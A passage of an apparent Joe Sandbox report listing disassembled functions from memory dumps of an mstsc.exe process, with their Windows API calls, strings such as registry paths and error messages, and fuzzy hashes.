                                                                                                                                                                                    Function 00920375 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 256windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00920AC3: GetClientRect.USER32(?,00000006,?,?,00000000,00000006,00000000,?), ref: 00920AE1
                                                                                                                                                                                      • Part of subcall function 00920AC3: RedrawWindow.USER32(?,00000006,00000000,00000045), ref: 00920AF9
                                                                                                                                                                                    • GetLastError.KERNEL32(?,00000400,00000000,?,?,?,0091E364,00000000,00000006,00000000,?), ref: 00920483
                                                                                                                                                                                    • GetLastError.KERNEL32(?,00000400,00000000,?,?,?,0091E364,00000000,00000006,00000000,?), ref: 009205E9
                                                                                                                                                                                    • GetLastError.KERNEL32(?,00000400,?,00000400,00000000,?,?,?,0091E364,00000000,00000006,00000000,?), ref: 0092064E
                                                                                                                                                                                      • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
                                                                                                                                                                                      • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
                                                                                                                                                                                      • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
                                                                                                                                                                                      • Part of subcall function 0091D87E: TraceMessage.ADVAPI32(?,00000000,0000002B,00908AB4,00000028,00000000,00000004,NULL,0000000A,0094BF7D,00000004,00000000,00000000,00000000,80070000,00000028), ref: 0091D8F1
                                                                                                                                                                                      • Part of subcall function 00921012: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00921050
                                                                                                                                                                                      • Part of subcall function 00921012: memset.MSVCRT ref: 0092107C
                                                                                                                                                                                      • Part of subcall function 00921012: SendMessageW.USER32(?,0000104B,00000000,?), ref: 009210C3
                                                                                                                                                                                      • Part of subcall function 00921012: lstrcmpiW.KERNEL32(?,?,?,?,?), ref: 009210D5
                                                                                                                                                                                      • Part of subcall function 009145D2: _vsnwprintf.MSVCRT ref: 00914604
                                                                                                                                                                                    • ShellMessageBoxW.SHLWAPI ref: 009206BB
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Message$ErrorLast$Send$AddressClientFreeHandleLibraryModuleProcRectRedrawShellTraceWindow_vsnwprintflstrcmpimemset
                                                                                                                                                                                    • String ID: StringCchPrintf failed
                                                                                                                                                                                    • API String ID: 2650913945-1082955989
                                                                                                                                                                                    • Opcode ID: 5234cbec165d16b74a8ae2ee82465c5d32f172d2679c858661987ed73ba088ba
                                                                                                                                                                                    • Instruction ID: 7b9dba31b35054756615ef3b38ecbcb04774fe6464d8b65c180c0f2476fbfed4
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5234cbec165d16b74a8ae2ee82465c5d32f172d2679c858661987ed73ba088ba
                                                                                                                                                                                    • Instruction Fuzzy Hash: 92912F712083006FDB29DF14E889F6A73AEABD9308F14440DF605AB6E7C676DC519B12
                                                                                                                                                                                    Function 0092F229 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 207COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • wcsstr.MSVCRT ref: 0092F42E
                                                                                                                                                                                    • wcschr.MSVCRT ref: 0092F443
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,00000000,000036C5), ref: 0092F4A4
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • cookie=, xrefs: 0092F428
                                                                                                                                                                                    • Attempted override of sensitive settings for signed file, xrefs: 0092F4D1
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: HandleModulewcschrwcsstr
                                                                                                                                                                                    • String ID: Attempted override of sensitive settings for signed file$cookie=
                                                                                                                                                                                    • API String ID: 2156438982-3397407268
                                                                                                                                                                                    • Opcode ID: 6c0e8d54fb548387b7fbcc4bfa0f787ddd196cceb780fdbb4ab3b8c05f5823cc
                                                                                                                                                                                    • Instruction ID: b69016eb60efef3c0b7112afd1c95f0aa5d90c750fc13cb268e27421f33ca355
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6c0e8d54fb548387b7fbcc4bfa0f787ddd196cceb780fdbb4ab3b8c05f5823cc
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9B81A3745007148FDB29EF25E4A46E677FAFB88340B18857EEC4A8B259D774A880CF64
                                                                                                                                                                                    Function 0091F375 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 195windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SendMessageW.USER32(?,00001009,00000000,00000000), ref: 0091F3B4
                                                                                                                                                                                    • memset.MSVCRT ref: 0091F3DB
                                                                                                                                                                                    • GetLastError.KERNEL32(?,00000100), ref: 0091F3FE
                                                                                                                                                                                      • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
                                                                                                                                                                                      • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
                                                                                                                                                                                      • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
                                                                                                                                                                                      • Part of subcall function 00912C68: TraceMessage.ADVAPI32(00000000,00000000,0000002B,00907B50,0000000B,0091396B,00000004,00943BC2,00000004,00000000,?,00943BC2,0091396B,00000000,00000000,00000000), ref: 00912C85
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Message$AddressErrorFreeHandleLastLibraryModuleProcSendTracememset
                                                                                                                                                                                    • String ID: AddRemoteApplicationToQueueUi failed!$SetAppIDAndDisablePinning failed!
                                                                                                                                                                                    • API String ID: 2233238036-2972087449
                                                                                                                                                                                    • Opcode ID: 016834e843025eae7264aaa64a482c54dfbd5ffd29b3fbe1313f3356e939f93d
                                                                                                                                                                                    • Instruction ID: 662a0ff6294f68ef8d6cbfecde6ce6bc1ce0d19b84d4029f36cd7f591edaa6c6
                                                                                                                                                                                    • Opcode Fuzzy Hash: 016834e843025eae7264aaa64a482c54dfbd5ffd29b3fbe1313f3356e939f93d
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2461BF7130834D6FD71ADF60D969FB277AAAB84308F14006DF9019B1A2CA71ECC2EB51
                                                                                                                                                                                    Function 0094DAEE Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 178registryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • RegOpenKeyExW.ADVAPI32 ref: 0094DB88
                                                                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?), ref: 0094DBFA
                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 0094DCB0
                                                                                                                                                                                      • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
                                                                                                                                                                                      • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
                                                                                                                                                                                      • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
                                                                                                                                                                                      • Part of subcall function 0094D76F: TraceMessage.ADVAPI32(?,?,0000002B,00908C04,?,00000000,00000004,NULL,0000000A,NULL,0000000A,0094DC4D,00000004,00000000,?,00000000), ref: 0094D835
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressCloseFreeHandleLibraryMessageModuleOpenProcQueryTraceValue
                                                                                                                                                                                    • String ID: SOFTWARE\Microsoft\Terminal Server Client\%s$\
                                                                                                                                                                                    • API String ID: 2288772661-3337323198
                                                                                                                                                                                    • Opcode ID: dbc6cd7462cb1bfa7709bc3d839e036bf47e8f0ed509d401a503ac6da36fcc97
                                                                                                                                                                                    • Instruction ID: 3b97321a1929fcecfadc25cc7a77cb3962647895021aac6b3b346d5d5e059a03
                                                                                                                                                                                    • Opcode Fuzzy Hash: dbc6cd7462cb1bfa7709bc3d839e036bf47e8f0ed509d401a503ac6da36fcc97
                                                                                                                                                                                    • Instruction Fuzzy Hash: 53510179219301AFDB29EF64C894F6A7BE9EF88304F04091DF981972A1C7B1DC50EB52
                                                                                                                                                                                    Function 0094D92C Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 148registryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 009145D2: _vsnwprintf.MSVCRT ref: 00914604
                                                                                                                                                                                    • RegOpenKeyExW.ADVAPI32 ref: 0094D9AD
                                                                                                                                                                                    • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0094DA82
                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 0094DA93
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CloseEnumOpenValue_vsnwprintf
                                                                                                                                                                                    • String ID: SOFTWARE\Microsoft\Terminal Server Client\%s$\
                                                                                                                                                                                    • API String ID: 143769899-3337323198
                                                                                                                                                                                    • Opcode ID: fb1826b6ede0f8d456cef74569c8ac7a267faa67c89913979229a795220871eb
                                                                                                                                                                                    • Instruction ID: bfe5d9cd12fe23b623f002d7dce14479b0aa1ded09028ea3ea43e2bf126dfc9a
                                                                                                                                                                                    • Opcode Fuzzy Hash: fb1826b6ede0f8d456cef74569c8ac7a267faa67c89913979229a795220871eb
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3A41FFB561A214AACB28DF54DC88FBB7B6DEF49304F04009DFA0997251D771CE84CBA4
                                                                                                                                                                                    Function 0094B0B3 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 140memoryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CredUIPromptForWindowsCredentialsW.CREDUI(00000014,?,?,00000000,?,?,00000000,?,?,00000000,00000000,00000000), ref: 0094B19F
                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000000), ref: 0094B1B0
                                                                                                                                                                                      • Part of subcall function 0094B603: LsaConnectUntrusted.SECUR32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 0094B61C
                                                                                                                                                                                      • Part of subcall function 0094B603: LsaDeregisterLogonProcess.SECUR32(00000000), ref: 0094B6D0
                                                                                                                                                                                    • memcpy.MSVCRT(00000000,?,00000000), ref: 0094B1C7
                                                                                                                                                                                      • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
                                                                                                                                                                                      • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
                                                                                                                                                                                      • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
                                                                                                                                                                                      • Part of subcall function 00910EEC: TraceMessage.ADVAPI32(00000001,?,0000002B,0090B78C,00000046,00000008,00000004,00000000,00000005,00000000,00000004,00000000,0096A020,00000000,0096A020), ref: 00910F32
                                                                                                                                                                                    • CoTaskMemFree.OLE32(?), ref: 0094B227
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • GetAuthenticationPackageId failed!, xrefs: 0094B14D
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Free$AddressAllocConnectCredCredentialsDeregisterHandleLibraryLocalLogonMessageModuleProcProcessPromptTaskTraceUntrustedWindowsmemcpy
                                                                                                                                                                                    • String ID: GetAuthenticationPackageId failed!
                                                                                                                                                                                    • API String ID: 2033552025-2246485560
                                                                                                                                                                                    • Opcode ID: e18dd4c39ff7726f4e814347d599cd0a7a1ce260a34cf7523df8b8cf07ca58cf
                                                                                                                                                                                    • Instruction ID: 0801b2660d3579f3675d8fc0b7ef5ec1a8261e5e821d4681145ee4a4c53dd89c
                                                                                                                                                                                    • Opcode Fuzzy Hash: e18dd4c39ff7726f4e814347d599cd0a7a1ce260a34cf7523df8b8cf07ca58cf
                                                                                                                                                                                    • Instruction Fuzzy Hash: 77519A71A04309AFDF25CFA8C884FAEBBB9FF58304F144069EA10A7261D771D940EB51
                                                                                                                                                                                    Function 0093C220 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 135windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00950BC7: GetDlgItem.USER32(00000000,?), ref: 00950BD8
                                                                                                                                                                                      • Part of subcall function 00950BC7: EnableWindow.USER32(00000000,750BDBF5), ref: 00950BE6
                                                                                                                                                                                    • SendDlgItemMessageW.USER32(?,00003345,000000F1,00000000,00000000,00003346,?,750BDBF5,?,?,?,00000000,?,00000000), ref: 0093C288
                                                                                                                                                                                    • SendDlgItemMessageW.USER32(?,0000334A,00000144,00000000,00000000,?,00000000,?), ref: 0093C2B5
                                                                                                                                                                                    • SendDlgItemMessageW.USER32(?,0000334A,0000014E,?,00000000,?,00907260,00907240,00000002,?,?,00000000,?), ref: 0093C336
                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,00003348,00000000,00907248,00000002,00000000,?,00000000), ref: 0093C364
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • AddStringToComboBox failed!, xrefs: 0093C394
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Item$MessageSend$EnableTextWindow
                                                                                                                                                                                    • String ID: AddStringToComboBox failed!
                                                                                                                                                                                    • API String ID: 3122374576-2926826431
                                                                                                                                                                                    • Opcode ID: 20bc2f721ad51dfaa378c1754caa0eb9f9ebd0f67cae509c5cb8db4cec9b9eaa
                                                                                                                                                                                    • Instruction ID: 6234fa792686966f19942bf6840229c73738549ce1505001aaf58033c139a72b
                                                                                                                                                                                    • Opcode Fuzzy Hash: 20bc2f721ad51dfaa378c1754caa0eb9f9ebd0f67cae509c5cb8db4cec9b9eaa
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2541F3B1A44705BBDB259B64CC4ABADBBA5FB44B50F008165F915BB2E0C770AD60DF80
                                                                                                                                                                                    Function 0091829E Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 134COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,009339E2,?,00000000,?,0091569A,?), ref: 009182C5
                                                                                                                                                                                      • Part of subcall function 00923BBC: memset.MSVCRT ref: 00923C13
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • QI for IID_IMsRdpClientNonScriptable4 failed!, xrefs: 00918327
                                                                                                                                                                                    • ApplyTSWASettings failed!, xrefs: 009183BF
                                                                                                                                                                                    • ApplyRDPSigningSettings failed!, xrefs: 00918379
                                                                                                                                                                                    • StartRemoteApplication failed, xrefs: 00918404
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: HandleModulememset
                                                                                                                                                                                    • String ID: ApplyRDPSigningSettings failed!$ApplyTSWASettings failed!$QI for IID_IMsRdpClientNonScriptable4 failed!$StartRemoteApplication failed
                                                                                                                                                                                    • API String ID: 1044559590-403600509
                                                                                                                                                                                    • Opcode ID: 3f4c5aa3a5f9dd9e20cc4cde5392c4586428a61e3129cd8edc4515c671a14071
                                                                                                                                                                                    • Instruction ID: fe80186e90ba23bbe76f8d10f15762f34a842e96465b7dd4117dbb50d306e914
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3f4c5aa3a5f9dd9e20cc4cde5392c4586428a61e3129cd8edc4515c671a14071
                                                                                                                                                                                    • Instruction Fuzzy Hash: 44419432B0835AAFDB25CF94D849FA67A9AAB45314F150098F901AB1F2CF74DC80FB55
                                                                                                                                                                                    Function 009560DA Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 126COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • wcstok_s.MSVCRT ref: 00956130
                                                                                                                                                                                      • Part of subcall function 00964E47: EventActivityIdControl.ADVAPI32(00000001,00000000,0096A020,00000000,00000000,00000000), ref: 00964E6E
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ActivityControlEventwcstok_s
                                                                                                                                                                                    • String ID: Field in SignScope not found in store$RecordToString failed$SignScope$SignScope field not found in store
                                                                                                                                                                                    • API String ID: 1933954927-1973409768
                                                                                                                                                                                    • Opcode ID: b2bc31007854c65c49df1bd2c8d6c3057394e7c29e554fe139a3002473eaa5b0
                                                                                                                                                                                    • Instruction ID: c4406982d31dfddf81ff4f6a885f5ed540e54059c7de54e0b29d761fd0438122
                                                                                                                                                                                    • Opcode Fuzzy Hash: b2bc31007854c65c49df1bd2c8d6c3057394e7c29e554fe139a3002473eaa5b0
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1B4155316083106EDB39CA56C869F2A7BAEAF8231AF44005CFC05EB292C670CD4CDBD1
                                                                                                                                                                                    Function 0095EA86 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 0095EAB3
                                                                                                                                                                                    • BeginPaint.USER32(?,00000000), ref: 0095EAC0
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0095EACA
                                                                                                                                                                                      • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
                                                                                                                                                                                      • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
                                                                                                                                                                                      • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
                                                                                                                                                                                      • Part of subcall function 00912C68: TraceMessage.ADVAPI32(00000000,00000000,0000002B,00907B50,0000000B,0091396B,00000004,00943BC2,00000004,00000000,?,00943BC2,0091396B,00000000,00000000,00000000), ref: 00912C85
                                                                                                                                                                                    • EndPaint.USER32(?,00000000), ref: 0095EB85
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • ForwardMessageToControl failed, xrefs: 0095EB56
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Paint$AddressBeginErrorFreeHandleLastLibraryMessageModuleProcTracememset
                                                                                                                                                                                    • String ID: ForwardMessageToControl failed
                                                                                                                                                                                    • API String ID: 2462654298-2091418350
                                                                                                                                                                                    • Opcode ID: bd4fedf9fa8f9eb32bc9901afef1edc552fe4c36c96431f11931858c367d6deb
                                                                                                                                                                                    • Instruction ID: e88c75ef9b3a59a57e42f109ef2f724eeba43ea1e75a596fc4228db67354f41d
                                                                                                                                                                                    • Opcode Fuzzy Hash: bd4fedf9fa8f9eb32bc9901afef1edc552fe4c36c96431f11931858c367d6deb
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4E312632A04318AFD729DF97CC85F6A7BB9AB45362F000549FC02A72A1C771ED05DB91
                                                                                                                                                                                    Function 022E14C0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • ___swprintf_l.LIBCMT ref: 0230EA22
                                                                                                                                                                                      • Part of subcall function 022E13CB: ___swprintf_l.LIBCMT ref: 022E146B
                                                                                                                                                                                      • Part of subcall function 022E13CB: ___swprintf_l.LIBCMT ref: 022E1490
                                                                                                                                                                                    • ___swprintf_l.LIBCMT ref: 022E156D
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928676089.0000000002290000.00000040.00001000.00020000.00000000.sdmp, Offset: 02280000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002280000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002370000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002380000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002384000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002387000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002390000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.00000000023F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_2280000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ___swprintf_l
                                                                                                                                                                                    • String ID: %%%u$]:%u
                                                                                                                                                                                    • API String ID: 48624451-3050659472
                                                                                                                                                                                    • Opcode ID: 76e51f14c2cdfb48b5cb9de888c1cca1c07c29b1587b9ebc15a94056e0150ef8
                                                                                                                                                                                    • Instruction ID: 07527fac2e9674884dc437ae7a0dc9d9ae60c89f406611e45bad24d216c2fa97
                                                                                                                                                                                    • Opcode Fuzzy Hash: 76e51f14c2cdfb48b5cb9de888c1cca1c07c29b1587b9ebc15a94056e0150ef8
                                                                                                                                                                                    • Instruction Fuzzy Hash: BB21B4729206199BDF20DE98CC40AEA73BDAF14704F844561FD4BD3148DB70AEA88BE0
                                                                                                                                                                                    Function 00926A02 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 89windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • TraceMessage.ADVAPI32(?,0092E339,0000002B,0092E339,?,?,00000004,NULL,0000000A,NULL,0000000A,00000000,MRU0,00000000,Default,0092E339), ref: 00926AC4
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageTrace
                                                                                                                                                                                    • String ID: <NULL>$Default$MRU0$NULL
                                                                                                                                                                                    • API String ID: 471583391-1578344839
                                                                                                                                                                                    • Opcode ID: 1054881b3b65f474e76a5d69d05e0c3f6b6505e82e2b0f7af44b5c0eb67ead1d
                                                                                                                                                                                    • Instruction ID: 2e27f1166dd3a27903b8f1604da5378e094dc3d2f4fc4b9f344c64ed88640188
                                                                                                                                                                                    • Opcode Fuzzy Hash: 1054881b3b65f474e76a5d69d05e0c3f6b6505e82e2b0f7af44b5c0eb67ead1d
                                                                                                                                                                                    • Instruction Fuzzy Hash: E6213836A01215ABCF34DF58EC40ABF7B79EB80700F24C42AE905AB948E2709E91C790
                                                                                                                                                                                    Function 02343DA7 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 82COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928676089.0000000002290000.00000040.00001000.00020000.00000000.sdmp, Offset: 02280000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002280000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002370000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002380000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002384000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002387000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002390000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.00000000023F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_2280000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ___swprintf_l
                                                                                                                                                                                    • String ID: %%%u$]:%u
                                                                                                                                                                                    • API String ID: 48624451-3050659472
                                                                                                                                                                                    • Opcode ID: a8d099d247b2ad38f7250c9b1302f04202cc6ff381014dfa23274660aa4563c4
                                                                                                                                                                                    • Instruction ID: 3c5780215b8c5bc48b005e8db0b7fde820a9a2658c695d8844925c761140621c
                                                                                                                                                                                    • Opcode Fuzzy Hash: a8d099d247b2ad38f7250c9b1302f04202cc6ff381014dfa23274660aa4563c4
